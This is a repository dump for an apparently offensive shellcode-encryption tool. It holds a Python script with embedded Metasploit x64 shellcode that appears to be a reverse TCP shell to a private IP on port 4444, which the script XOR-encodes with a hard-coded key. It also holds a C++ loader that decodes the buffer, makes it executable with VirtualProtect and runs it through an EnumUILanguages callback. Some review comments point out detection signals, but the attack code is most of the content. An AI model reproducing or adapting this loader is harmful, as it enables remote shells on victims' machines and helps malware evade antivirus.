34 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x64.ActiveCfg = Release|x64
35 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x64.Build.0 = Release|x64
36 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x86.ActiveCfg = Release|Win32
37 | {734881F0-B88D-41E3-B9C2-A48A8E0772D4}.Release|x86.Build.0 = Release|Win32
38 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x64.ActiveCfg = Debug|x64
39 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x64.Build.0 = Debug|x64
40 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x86.ActiveCfg = Debug|Win32
41 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Debug|x86.Build.0 = Debug|Win32
42 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x64.ActiveCfg = Release|x64
43 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x64.Build.0 = Release|x64
44 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x86.ActiveCfg = Release|Win32
45 | {B4DC16FF-79C8-4C66-BE29-8528B628B876}.Release|x86.Build.0 = Release|Win32
46 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x64.ActiveCfg = Debug|x64
47 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x64.Build.0 = Debug|x64
48 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x86.ActiveCfg = Debug|Win32
49 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Debug|x86.Build.0 = Debug|Win32
50 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x64.ActiveCfg = Release|x64
51 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x64.Build.0 = Release|x64
52 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x86.ActiveCfg = Release|Win32
53 | {1F7476FA-60C8-4F91-8FD5-C5E31D3A6888}.Release|x86.Build.0 = Release|Win32
54 | EndGlobalSection
55 | GlobalSection(SolutionProperties) = preSolution
56 | HideSolutionNode = FALSE
57 | EndGlobalSection
58 | GlobalSection(ExtensibilityGlobals) = postSolution
59 | SolutionGuid = {82722DB7-F2B9-48EA-A044-2762823E3C8D}
60 | EndGlobalSection
61 | EndGlobal
62 |
--------------------------------------------------------------------------------
/x64/Debug/Shellcode加密库.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/Shellcode加密库.idb
--------------------------------------------------------------------------------
/x64/Debug/Shellcode加密库.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/Shellcode加密库.lib
--------------------------------------------------------------------------------
/x64/Debug/Shellcode加密库.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/Shellcode加密库.pdb
--------------------------------------------------------------------------------
/x64/Debug/aes加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/aes加密.exe
--------------------------------------------------------------------------------
/x64/Debug/aes加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/aes加密.pdb
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.exe
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.exp
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.lib
--------------------------------------------------------------------------------
/x64/Debug/rsa加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/rsa加密.pdb
--------------------------------------------------------------------------------
/x64/Debug/xor加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/xor加密.exe
--------------------------------------------------------------------------------
/x64/Debug/xor加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Debug/xor加密.pdb
--------------------------------------------------------------------------------
/x64/Release/Shellcode加密库.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/Shellcode加密库.lib
--------------------------------------------------------------------------------
/x64/Release/Shellcode加密库.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/Shellcode加密库.pdb
--------------------------------------------------------------------------------
/x64/Release/aes加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/aes加密.exe
--------------------------------------------------------------------------------
/x64/Release/aes加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/aes加密.pdb
--------------------------------------------------------------------------------
/x64/Release/xor加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/xor加密.exe
--------------------------------------------------------------------------------
/x64/Release/xor加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/x64/Release/xor加密.pdb
--------------------------------------------------------------------------------
/xor加密/Shellcode_XorEncoder.py:
--------------------------------------------------------------------------------
# XOR encoding routine: takes the raw shellcode bytes and a key as input.
def xor_encrypt(shellcode, key):
    """Return ``shellcode`` XORed byte-by-byte with a repeating ``key``.

    Args:
        shellcode: indexable sequence of byte values (bytes / bytearray).
        key: indexable sequence of byte values; it is reused cyclically
            when it is shorter than ``shellcode``.

    Returns:
        A new ``bytearray`` of the same length as ``shellcode``.

    The transform is its own inverse: applying it again with the same key
    restores the input. Repeating-key XOR is an encoding, not a cipher that
    provides confidentiality; any known stretch of plaintext reveals the
    corresponding key bytes.
    """
    key_len = len(key)
    # pos % key_len wraps the index so the key repeats across the input.
    return bytearray(
        value ^ key[pos % key_len] for pos, value in enumerate(shellcode)
    )
12 |
def main() -> None:
    """Encode the embedded sample payload with a hard-coded key and print it.

    The result is written to stdout as one string of backslash-x hex escapes.
    """
    # msf-generated shellcode
    buf = b""
    buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
    buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
    buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
    buf += b"\x50\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48\x31\xc0"
    buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
    buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
    buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
    buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
    buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
    buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48"
    buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
    buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
    buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
    buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
    buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
    buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
    buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
    buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
    buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
    buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
    buf += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x2f\x9b\x41\x54"
    buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
    buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
    buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
    buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
    buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
    buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
    buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
    buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
    buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
    buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
    buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
    buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
    buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
    buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
    buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
    buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
    buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
    buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
    buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
    buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
    buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
    buf += b"\xf0\xb5\xa2\x56\xff\xd5"

    shellcode = bytearray(buf)

    # Define the key.
    # NOTE(review): the key is a plain literal here, and the same literal is
    # embedded in xor加密.cpp next to the encoded bytes, so the output can be
    # decoded by anyone holding either file. This is obfuscation only.
    key = bytearray(b'henry123456aa+-==@asd')

    # XOR the shellcode with the key via xor_encrypt.
    encrypted_shellcode = xor_encrypt(shellcode, key)

    # Print the encoded bytes, each formatted as a two-digit hex escape.
    print("Encrypted shellcode:")
    encrypted_shellcode_string = ""
    for byte in encrypted_shellcode:
        encrypted_shellcode_string += ("\\x%02x"%byte)
    print(encrypted_shellcode_string)
74 |
# Run the encoder only when this file is executed as a script, not on import.
if __name__ == '__main__':
    main()
77 |
78 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/xor加密/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\vc143.pdb
2 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\vc143.idb
3 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.obj
4 | e:\source code\c_code\shellcode加密\x64\debug\xor加密.exe
5 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.ilk
6 | e:\source code\c_code\shellcode加密\x64\debug\xor加密.pdb
7 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\link.command.1.tlog
11 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\link.read.1.tlog
12 | e:\source code\c_code\shellcode加密\xor加密\x64\debug\xor加密.tlog\link.write.1.tlog
13 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Debug\xor加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.ilk
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.log:
--------------------------------------------------------------------------------
1 | xor加密.cpp
2 | E:\Source Code\C_code\shellcode加密\xor加密\xor加密.cpp(16,32): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
3 | xor加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\xor加密.exe
4 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\xor加密.exe" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\xor加密.tlog\xor加密.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
5 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.obj
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.tlog/xor加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/xor加密/x64/Debug/xor加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Debug/xor加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/xor加密/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/xor加密/x64/Release/vcpkg.applocal.log:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\xor加密\x64\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.obj
3 | e:\source code\c_code\shellcode加密\x64\release\xor加密.exe
4 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.ipdb
5 | e:\source code\c_code\shellcode加密\x64\release\xor加密.pdb
6 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.iobj
7 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\link.command.1.tlog
11 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\link.read.1.tlog
12 | e:\source code\c_code\shellcode加密\xor加密\x64\release\xor加密.tlog\link.write.1.tlog
13 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Release\xor加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.iobj
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.ipdb
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.log:
--------------------------------------------------------------------------------
1 | xor加密.cpp
2 | E:\Source Code\C_code\shellcode加密\xor加密\xor加密.cpp(16,32): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
3 | 正在生成代码
4 | Previous IPDB not found, fall back to full compilation.
5 | All 4 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
6 | 已完成代码的生成
7 | xor加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Release\xor加密.exe
8 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Release\xor加密.exe" "E:\vcpkg\installed\x64-windows\bin" "x64\Release\xor加密.tlog\xor加密.write.1u.tlog" "x64\Release\vcpkg.applocal.log"
9 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.obj
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.tlog/xor加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/xor加密/x64/Release/xor加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/xor加密/x64/Release/xor加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/xor加密/xor加密.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
// Decodes the embedded XOR-encoded buffer with a hard-coded key, prints the
// decoded bytes, marks the buffer executable and hands its address to
// EnumUILanguages as the callback.
int main() {
    // Holds the XOR-encoded shellcode. The leading bytes are consistent with
    // the encoder script's payload XORed with the key below.
    char encryptedShellcode[] = "\x94\x2d\xed\x96\x89\xd9\xfe\x33\x34\x35\x77\x30\x20\x7b\x7f\x6c\x6b\x08\x50\xa1\x01\x20\xee\x3c\x12\x31\xba\x60\x2b\x7c\xbe\x64\x41\x29\xa0\x5f\x6d\x70\x71\xa8\x3b\x6b\xdf\x2f\x24\x3a\x48\xf1\x9e\x0f\x55\x49\x34\x4d\x41\x6a\xec\xf4\x30\x01\x60\xb2\x86\x85\x37\x2f\x23\x31\xba\x60\x13\xbf\x77\x0a\x29\x60\xfb\x4b\xbc\x45\x58\x6a\x71\x6b\xed\x17\x6e\x72\x79\xba\xb2\xbb\x34\x35\x36\x29\xe4\xeb\x59\x5a\x75\x41\xb1\x23\xef\x20\x7d\x2a\xf9\x39\x11\x7b\x32\xe4\xd6\x60\x2c\x50\xe2\x65\xc2\xf4\x01\xea\x47\xec\x20\x64\xb8\x3a\x48\xf1\x9e\x72\xf5\xfc\x3b\x20\x60\xea\x15\xdd\x48\xb1\x2d\x70\x28\x4c\x6d\x2b\x4b\xa8\x44\xea\x6b\x70\xbe\x76\x45\x28\x2a\xfd\x5b\x7c\xcb\x6d\x3b\x20\xe3\x25\x72\x3b\x78\xe1\x73\xb8\x30\xbd\x7e\x60\xb1\x6a\x75\x7c\x65\x1e\x38\x29\x25\x30\x24\x37\x33\x23\x79\xb1\xdf\x14\x74\x64\x9e\x81\x73\x6c\x64\x67\x08\xea\x61\x8d\x23\x9a\x91\x8d\x24\x78\x8c\x44\x47\x07\x69\x52\x53\x2b\x2d\x7c\x6b\x09\xe8\x95\x2c\xe9\x89\xce\x73\x79\x31\x7b\xba\xd1\x7c\x8a\x63\x61\x3a\x71\xfd\x95\x6f\xfa\x32\x30\x21\xec\x8a\x3e\xf0\xc0\x73\x89\x78\x42\x10\x66\x9e\xfe\x61\xb4\xd7\x28\x60\x72\x64\x68\x3c\x2f\xc8\x50\xb1\x59\x33\xcb\xe0\x5c\x6b\x20\x75\x7d\x6d\x70\x71\xa8\x3e\x55\xa8\x2d\x91\xb2\x31\xb8\xf0\x7b\xcb\xf5\x7e\xe8\xa0\x6a\x97\xd7\x32\x9f\x81\x8c\xb1\x20\xec\xa9\x18\x69\x70\x6a\x7f\xbd\xd7\x7e\xe8\x98\x6a\x97\xa4\x98\x34\x00\x8c\xb1\xed\xa5\x1a\x78\x30\xce\xfc\x46\xd1\xdd\xa5\x61\x61\x2b\x65\xbe\xd1\x50\x29\xfa\x86\x25\x54\xa7\x18\x7d\x70\x6a\x7b\xbd\xcc\x77\xdb\x63\xf2\xe5\x62\xc2\x95\xe2\x8b\x64\x16\x30\x26\xf1\xbd\x11\x6c\xba\xc2\x5f\x76\x20\x38\x43\x2d\x2d\x3d\x40\x20\x2b\x2c\xe1\x97\x26\x43\xb0\x70\x88\x6b\x90\x66\xd3\x9e\xb4\x63\xa4\xfe\x74\xc9\xa6\x3e\x55\xa1\x2c\xe7\x82\x31\xb8\xe8\x7b\xbd\xcc\x77\xdb\x63\xf2\xe5\x62\xc2\x95\xe2\x8b\x64\x15\x4d\x36\x33\x2e\x68\x5a\x33\x74\x35\x36\x20\x39\x41\x2d\x67\x7c\xfa\x6a\x5c\x6b\x58\x9a\xbb\x25\x20\x70\x88\x46\x5a\x78\x57\x9e\xb4\x62\xd2\xf3\xd4\x7c\x9e\x8c\x9b\x20\x64\xad\x3a\x50\xf7\x7a\xb6\xc2\x40\x82\x20\x9e\xcc\x75\x57\x3d\x19\x28\xb4\xa6\x98\xd0\xcc\x24\x86\xe4";

    // Key used for decoding.
    // NOTE(review): the key sits in the binary as a plain string beside the
    // encoded buffer, so static analysis can recover the payload by XORing
    // the two; the encoding only defeats byte-pattern matching on the
    // original payload.

    char key[] = "henry123456aa+-==@asd";

    // Local array of the same size as the encoded buffer, to receive the
    // decoded bytes. sizeof of a char array initialised from a string literal
    // counts the terminating NUL, so this is one byte longer than the payload.
    unsigned char shellcode[sizeof encryptedShellcode];

    // Key length. strlen returns size_t; the narrowing to int is what the
    // C4267 warning in the build log reports for line 16 of this file.
    int keylength = strlen(key);

    // Walk the encoded buffer, XOR each byte with the repeating key and store
    // the result in shellcode. Each decoded byte is also printed to stdout.
    for (int i = 0; i < sizeof encryptedShellcode; i++) {
        shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
        printf("\\x%x", shellcode[i]);
    }

    // Address of the decoded buffer.
    char* addrShellcode = (char*)shellcode;

    // Receives the previous memory protection value.
    DWORD dwOldPro = 0;

    // Change the protection of the memory holding the decoded buffer to
    // execute + read + write. The result is stored in ifExec but never checked.
    // NOTE(review): a VirtualProtect call that makes a local (automatic-storage)
    // buffer PAGE_EXECUTE_READWRITE is a behaviour endpoint monitoring
    // commonly flags.
    BOOL ifExec = VirtualProtect(addrShellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &dwOldPro);

    // Pass the buffer address to EnumUILanguages as its callback, so the API
    // calls into the decoded bytes.
    // NOTE(review): the callback pointer lies outside any loaded module image,
    // which is a usable detection signal for this pattern.
